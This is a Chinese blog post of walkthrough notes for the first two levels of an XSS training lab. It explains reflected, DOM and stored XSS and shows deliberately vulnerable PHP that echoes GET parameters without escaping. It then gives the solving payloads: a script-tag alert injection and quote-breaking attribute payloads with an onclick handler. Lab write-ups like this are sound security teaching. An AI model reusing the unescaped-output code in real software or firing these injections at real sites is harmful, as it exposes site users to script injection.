XSS跨站攻击靶场-通关笔记
XSS跨站攻击靶场-通关笔记
微软技术分享
发布于 2022-12-28 15:46:38
发布于 2022-12-28 15:46:38
XSS攻击是Web攻击中最常见的攻击手法之一,XSS中文名跨站脚本攻击,该攻击是指攻击者在网页中嵌入恶意的客户端脚本,通常是使用JS编写的恶意代码,当正常用户访问被嵌入代码的页面时,恶意代码将会在用户的浏览器上执行,所以XSS攻击主要时针对客户端的攻击手法。
当下常见的 XSS 攻击有三种:反射型、DOM型、存储型。 其中反射型、DOM型可以归类为非持久型 XSS 攻击,存储型归类为持久型 XSS 攻击。
练习环境:https://github.com/lyshark/xss-labs.git
第一关
<?php
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>payload : lyshark.com/level1.php?name= <script>alert('hello');</script>
第二关
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>
</center>';
?>首先确定输入后的内容,在哪里显示出来了。
发现能够闭合
|"><script>alert('xss');</script>| <input name=keyword value=""><script>alert('xss');</script>">|
|"onclick="window.alert() | <input name=keyword value=""onclick="window.alert()">|
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2019-08-10,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
相关产品与服务
对象存储
对象存储(Cloud Object Storage,COS)是由腾讯云推出的无目录层次结构、无数据格式限制,可容纳海量数据且支持 HTTP/HTTPS 协议访问的分布式存储服务。腾讯云 COS 的存储桶空间无容量上限,无需分区管理,适用于 CDN 数据分发、数据万象处理或大数据计算与分析的数据湖等多种场景。
腾讯云开发者
